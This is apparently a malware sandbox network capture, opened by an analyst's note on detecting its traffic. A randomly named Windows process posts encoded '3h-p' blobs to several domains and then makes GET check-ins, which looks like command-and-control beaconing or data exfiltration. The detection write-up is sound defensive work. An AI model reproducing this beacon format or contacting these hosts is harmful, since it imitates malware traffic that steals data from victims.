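Run as a script it prints the one flagged host with all seven indicator names; in a pipeline the raw strings would come from a proxy log or a packet-capture export rather than the literal list. Note that split_form deliberately avoids urllib's parse_qsl, which would turn the '+' characters inside the blob into spaces and break the base64-alphabet check. The User-Agent string and the yP value are exact matches against this run and therefore the weakest evidence; the single-field POST, the self-referencing Origin/Referer, the POST/POST/POST/GET cadence and the constant blob prefix are what the min_hits threshold should mostly rest on.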


                                        Session ID: 22 | Source: 192.168.2.7:54974 | Destination: 162.0.238.238:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:46.054124117 CEST | Bytes transferred: 755 | Direction: OUT | Data:
                                        POST /orig/ HTTP/1.1
                                        Host: www.priunit.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.priunit.online
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.priunit.online/orig/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 6d 2f 45 65 38 79 32 69 44 31 65 77 62 51 7a 5a 66 43 6c 4f 31 57 64 39 6b 4d 48 6a 4a 79 50 6a 4a 34 61 42 2b 6a 34 69 4b 61 39 6a 42 71 78 75 4f 32 56 33 63 61 49 37 4a 56 32 53 79 78 43 53 39 68 51 56 55 31 58 79 64 6a 4b 59 77 67 64 59 64 46 56 48 64 74 4a 63 7a 67 55 2f 56 5a 33 6e 79 52 4b 45 5a 79 2f 2b 65 61 52 68 31 2b 37 2b 35 2f 4e 6c 50 4e 58 46 39 71 6e 2f 39 55 4c 4d 4f 76 63 79 67 33 39 42 45 7a 34 47 32 51 49 36 46 5a 34 4d 56 65 44 47 42 71 5a 5a 46 6e 35 50 55 62 69 57 2f 4e 6c 6d 68 4f 54 72 4d 66 6a 63 71 6a 44 30 48 4d 56 46 45 48 71 77 47 46 44 53 74 58 4c 68 37 67 4f 39 35 30 59 33 55 31 33 66 2b 64 75 5a 49 74 2b 4c 47 55 2f 57 61 7a 30 65 56 71 54 4f 6d 61 34 3d
                                        Data Ascii: 3h-p=m/Ee8y2iD1ewbQzZfClO1Wd9kMHjJyPjJ4aB+j4iKa9jBqxuO2V3caI7JV2SyxCS9hQVU1XydjKYwgdYdFVHdtJczgU/VZ3nyRKEZy/+eaRh1+7+5/NlPNXF9qn/9ULMOvcyg39BEz4G2QI6FZ4MVeDGBqZZFn5PUbiW/NlmhOTrMfjcqjD0HMVFEHqwGFDStXLh7gO950Y3U13f+duZIt+LGU/Waz0eVqTOma4=
                                        Sep 27, 2024 06:36:46.661902905 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                        Date: Fri, 27 Sep 2024 04:36:46 GMT
                                        Server: Apache
                                        X-Frame-Options: SAMEORIGIN
                                        Content-Length: 389
                                        X-XSS-Protection: 1; mode=block
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        23 | 192.168.2.7 | 54975 | 162.0.238.238 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:36:48.929270029 CEST | 1768 | OUT | POST /orig/ HTTP/1.1
                                        Host: www.priunit.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.priunit.online
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.priunit.online/orig/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 6d 2f 45 65 38 79 32 69 44 31 65 77 62 51 7a 5a 66 43 6c 4f 31 57 64 39 6b 4d 48 6a 4a 79 50 6a 4a 34 61 42 2b 6a 34 69 4b 61 31 6a 43 59 35 75 49 58 56 33 64 61 49 37 4b 56 32 50 79 78 43 50 39 68 59 5a 55 31 62 45 64 68 79 59 7a 43 46 59 62 77 70 48 55 74 4a 63 76 51 55 76 49 4a 33 49 79 52 62 50 5a 79 50 2b 65 61 52 68 31 38 54 2b 2f 71 78 6c 4a 4e 58 47 36 71 6e 37 71 45 4c 6f 4f 76 6c 48 67 32 49 30 46 44 59 47 32 77 59 36 4b 4b 51 4d 61 65 44 45 4d 4b 59 65 46 6e 39 4d 55 62 2b 67 2f 4d 41 37 68 4a 2f 72 4d 62 79 41 32 69 62 66 45 4b 39 41 4f 57 2b 48 41 31 69 68 6a 6d 7a 49 37 42 79 50 39 33 59 79 64 6d 72 73 7a 64 44 6d 52 73 7a 2f 42 67 4c 7a 55 6a 64 4d 48 5a 6e 54 35 2b 62 47 65 75 63 63 79 75 76 4b 4d 62 65 7a 78 70 36 53 53 41 46 73 54 31 65 52 7a 49 62 58 53 6c 5a 37 63 56 68 68 56 65 51 58 2b 79 6c 72 7a 34 6a 79 70 6f 45 70 37 43 51 59 79 70 30 78 31 46 54 54 51 45 5a 68 7a 62 32 66 51 74 38 52 74 6b 79 4f 75 78 76 49 68 33 50 2b 42 78 51 30 54 4d 6e 59 6d 31 74 53 65 [TRUNCATED]
                                        Data Ascii: 3h-p= [TRUNCATED]
                                        Sep 27, 2024 06:36:49.533869028 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                        Date: Fri, 27 Sep 2024 04:36:49 GMT
                                        Server: Apache
                                        X-Frame-Options: SAMEORIGIN
                                        Content-Length: 389
                                        X-XSS-Protection: 1; mode=block
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        24 | 192.168.2.7 | 54976 | 162.0.238.238 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:36:51.473756075 CEST | 471 | OUT | GET /orig/?3h-p=r9s+/C+7L0qcfQ3EbyhZ2kI2mfDPPCLNOvfr7UsjKcZTLpRbSSlLUqZEJhqx10+0pCoVRF7rGimcnTkgfg8ZHeQ80zp2CbjJ0RatJE7Uf95oksT4wdlZdM+V6Ku6rQ/6CIovtXlWMzNh&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.priunit.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:36:52.047997952 CEST | 610 | IN | HTTP/1.1 404 Not Found
                                        Date: Fri, 27 Sep 2024 04:36:51 GMT
                                        Server: Apache
                                        X-Frame-Options: SAMEORIGIN
                                        Content-Length: 389
                                        X-XSS-Protection: 1; mode=block
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        25 | 192.168.2.7 | 54977 | 3.33.130.190 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:36:57.165026903 CEST | 756 | OUT | POST /f1ix/ HTTP/1.1
                                        Host: www.consultarfacil.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.consultarfacil.online
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.consultarfacil.online/f1ix/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 61 4f 56 4d 63 65 57 4a 67 2b 69 62 54 50 4c 42 68 51 77 32 6d 6c 50 73 47 62 34 6c 2b 53 73 51 58 43 64 61 72 35 41 61 36 59 34 72 6e 67 78 34 74 78 78 7a 4b 36 59 57 35 6b 55 66 7a 52 49 38 77 2b 48 59 7a 44 4c 35 2f 65 47 71 71 45 42 48 44 75 48 62 36 67 6a 44 37 6b 61 34 7a 49 2b 43 6e 42 41 35 52 54 6c 32 6b 56 49 42 6a 64 47 68 6d 6e 65 42 4b 50 55 65 4b 46 57 46 6e 79 78 66 75 65 57 7a 2f 66 73 74 36 68 63 46 70 6e 4e 32 78 75 42 61 59 79 4f 2f 77 4c 44 66 72 77 65 35 70 44 4d 4b 36 5a 2b 44 64 5a 47 36 6b 36 30 79 6d 76 69 75 52 65 4b 4d 34 5a 6c 70 31 2b 6e 64 55 38 6f 59 44 2b 33 36 71 54 58 4b 30 65 76 75 2f 67 3d 3d
                                        Data Ascii: 3h-p=aOVMceWJg+ibTPLBhQw2mlPsGb4l+SsQXCdar5Aa6Y4rngx4txxzK6YW5kUfzRI8w+HYzDL5/eGqqEBHDuHb6gjD7ka4zI+CnBA5RTl2kVIBjdGhmneBKPUeKFWFnyxfueWz/fst6hcFpnN2xuBaYyO/wLDfrwe5pDMK6Z+DdZG6k60ymviuReKM4Zlp1+ndU8oYD+36qTXK0evu/g==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        26 | 192.168.2.7 | 54978 | 3.33.130.190 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:37:00.077619076 CEST | 776 | OUT | POST /f1ix/ HTTP/1.1
                                        Host: www.consultarfacil.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.consultarfacil.online
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.consultarfacil.online/f1ix/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 61 4f 56 4d 63 65 57 4a 67 2b 69 62 53 73 44 42 6d 79 59 32 7a 56 4f 65 44 62 34 6c 6b 69 73 71 58 43 5a 61 72 34 55 77 36 4c 63 72 6e 46 56 34 73 77 78 7a 47 61 59 57 74 30 55 61 33 52 49 37 77 2b 44 2b 7a 47 6a 35 2f 66 69 71 71 41 46 48 44 39 76 45 37 77 6a 4e 7a 45 61 36 33 49 2b 43 6e 42 41 35 52 58 30 62 6b 56 51 42 67 75 65 68 6e 47 65 43 56 2f 55 64 50 31 57 46 6a 79 78 62 75 65 57 56 2f 65 77 44 36 6b 59 46 70 6e 64 32 78 66 42 5a 4e 69 4f 6c 2b 72 43 4a 73 46 2f 46 72 41 38 47 69 70 7a 64 61 49 75 53 6c 4d 70 51 38 4e 75 43 50 50 79 33 38 62 42 66 69 59 36 6f 57 39 73 41 4f 63 44 62 31 6b 79 67 35 4d 4f 71 70 64 38 56 6d 6f 73 6a 54 69 49 39 30 72 6c 55 57 6e 77 61 4d 73 59 3d
                                        Data Ascii: 3h-p=aOVMceWJg+ibSsDBmyY2zVOeDb4lkisqXCZar4Uw6LcrnFV4swxzGaYWt0Ua3RI7w+D+zGj5/fiqqAFHD9vE7wjNzEa63I+CnBA5RX0bkVQBguehnGeCV/UdP1WFjyxbueWV/ewD6kYFpnd2xfBZNiOl+rCJsF/FrA8GipzdaIuSlMpQ8NuCPPy38bBfiY6oW9sAOcDb1kyg5MOqpd8VmosjTiI90rlUWnwaMsY=


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        27 | 192.168.2.7 | 54979 | 3.33.130.190 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:37:02.613140106 CEST | 1789 | OUT | POST /f1ix/ HTTP/1.1
                                        Host: www.consultarfacil.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.consultarfacil.online
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.consultarfacil.online/f1ix/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 61 4f 56 4d 63 65 57 4a 67 2b 69 62 53 73 44 42 6d 79 59 32 7a 56 4f 65 44 62 34 6c 6b 69 73 71 58 43 5a 61 72 34 55 77 36 4c 55 72 6d 33 64 34 75 54 5a 7a 48 61 59 57 75 30 55 62 33 52 4a 6e 77 36 76 36 7a 47 6d 43 2f 63 4b 71 73 6a 4e 48 53 38 76 45 78 77 6a 4e 2f 6b 61 35 7a 49 2b 58 6e 42 77 39 52 54 51 62 6b 56 51 42 67 76 75 68 67 58 65 43 4f 2f 55 65 4b 46 57 42 6e 79 78 6a 75 65 50 75 2f 65 31 32 36 51 73 46 6f 47 74 32 7a 4e 5a 5a 4d 43 4f 6a 7a 4c 43 42 73 46 37 67 72 42 52 31 69 70 47 34 61 4a 61 53 6b 4e 73 4b 2f 73 2f 62 63 74 36 51 38 61 64 69 72 5a 71 46 4d 65 63 62 4e 50 62 45 39 32 2b 36 79 73 6d 43 71 6f 68 77 36 4f 4d 49 57 78 31 30 6c 4c 30 52 43 55 51 65 65 5a 6f 4a 34 74 7a 2b 71 53 59 61 43 69 5a 53 54 33 6a 34 72 31 37 4c 62 59 36 5a 68 6b 79 61 67 7a 72 4c 66 79 36 53 44 5a 46 55 4a 7a 44 57 65 72 43 73 54 7a 39 30 77 35 75 57 41 45 49 48 56 4e 78 32 6e 77 63 4c 6d 59 45 76 4b 48 4b 65 4f 74 6a 36 49 63 52 43 6a 67 61 6e 7a 43 75 57 4c 6a 6c 57 75 4a 30 75 54 [TRUNCATED]
                                        Data Ascii: 3h-p= [TRUNCATED]


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        28 | 192.168.2.7 | 54980 | 3.33.130.190 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:37:05.286014080 CEST | 478 | OUT | GET /f1ix/?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6 HTTP/1.1
                                        Host: www.consultarfacil.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Sep 27, 2024 06:37:05.757775068 CEST | 416 | IN | HTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Fri, 27 Sep 2024 04:37:05 GMT
                                        Content-Type: text/html
                                        Content-Length: 276
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 50 3d 4d 78 58 48 64 6c 7a 70 51 72 64 30 26 33 68 2d 70 3d 58 4d 39 73 66 70 36 35 73 4f 75 5a 65 63 33 65 70 78 63 6c 78 58 57 42 42 4a 55 78 69 68 4d 41 57 43 45 55 68 35 51 6e 6f 71 55 79 6e 32 68 43 32 56 74 57 48 65 55 35 75 47 6f 42 31 77 4d 34 6a 5a 37 41 30 44 4c 70 6d 65 79 2f 68 43 52 46 5a 65 47 45 76 6a 37 71 37 58 58 35 78 72 65 37 75 52 59 71 42 48 64 41 31 45 68 43 32 4d 62 48 76 48 6d 30 58 63 31 43 41 68 4c 48 2b 55 6c 38 6f 4f 58 32 34 2f 77 55 79 45 52 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6"}</script></head></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        29 | 192.168.2.7 | 54981 | 34.76.205.124 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:37:10.877783060 CEST | 750 | OUT | POST /yxqi/ HTTP/1.1
                                        Host: www.exhibitarrange.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.exhibitarrange.shop
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.exhibitarrange.shop/yxqi/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 34 36 4d 70 61 2b 30 70 4b 41 51 59 65 61 36 32 73 48 38 2f 49 4d 61 4c 76 77 44 52 46 6b 4d 45 6d 47 49 75 55 51 33 54 6d 63 65 62 73 53 72 30 6c 2b 32 50 32 52 4b 59 46 4e 46 6f 63 71 31 32 65 76 2b 6e 54 5a 33 43 6d 78 33 73 71 59 78 6c 2b 77 32 36 7a 50 57 6c 41 67 55 2f 68 49 32 37 4f 78 46 2b 44 71 6d 46 77 5a 57 34 7a 30 41 37 51 44 6d 6c 77 48 72 61 5a 65 6b 39 79 4a 36 6e 6a 38 32 45 50 33 71 6d 4d 72 6a 33 4e 32 56 67 33 46 7a 77 67 2f 51 4e 78 61 4c 47 57 68 79 46 4d 4f 47 37 54 79 48 5a 42 6c 6d 4f 38 59 6a 69 39 39 72 6f 6e 71 67 45 7a 31 35 71 52 53 64 43 6d 46 53 41 4a 6e 65 56 32 68 69 55 39 77 57 42 2b 77 3d 3d
                                        Data Ascii: 3h-p=46Mpa+0pKAQYea62sH8/IMaLvwDRFkMEmGIuUQ3TmcebsSr0l+2P2RKYFNFocq12ev+nTZ3Cmx3sqYxl+w26zPWlAgU/hI27OxF+DqmFwZW4z0A7QDmlwHraZek9yJ6nj82EP3qmMrj3N2Vg3Fzwg/QNxaLGWhyFMOG7TyHZBlmO8Yji99ronqgEz15qRSdCmFSAJneV2hiU9wWB+w==
                                        Sep 27, 2024 06:37:11.483444929 CEST | 116 | IN | HTTP/1.1 404 Not Found
                                        Server: Caddy
                                        Date: Fri, 27 Sep 2024 04:37:11 GMT
                                        Content-Length: 0
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        30 | 192.168.2.7 | 54982 | 34.76.205.124 | 80 | 2340 | C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 27, 2024 06:37:13.458482981 CEST | 770 | OUT | POST /yxqi/ HTTP/1.1
                                        Host: www.exhibitarrange.shop
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.exhibitarrange.shop
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.exhibitarrange.shop/yxqi/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 34 36 4d 70 61 2b 30 70 4b 41 51 59 65 35 69 32 75 6b 55 2f 64 63 61 49 6a 51 44 52 50 45 4d 41 6d 48 30 75 55 52 79 4f 6d 6f 79 62 73 79 62 30 6b 2f 32 50 31 52 4b 59 4b 74 46 74 59 71 31 39 65 76 6a 53 54 63 66 43 6d 78 7a 73 71 5a 68 6c 2b 48 43 37 79 66 57 6e 4a 41 55 39 6c 49 32 37 4f 78 46 2b 44 71 69 76 77 59 2b 34 7a 45 77 37 54 69 6d 69 35 6e 71 6f 51 2b 6b 39 32 4a 36 6a 6a 38 32 36 50 32 6e 44 4d 70 72 33 4e 30 64 67 7a 48 62 33 37 50 51 48 73 71 4b 6c 5a 77 76 5a 46 74 58 47 4c 44 62 58 5a 57 61 37 35 75 2b 41 6e 66 6e 45 35 37 59 2f 33 33 64 63 47 30 41 33 6b 45 57 59 45 46 71 30 70 57 48 2b 77 69 33 46 6f 42 65 4b 4a 37 38 65 66 53 62 56 2f 78 4d 4c 6c 72 53 38 53 4c 67 3d
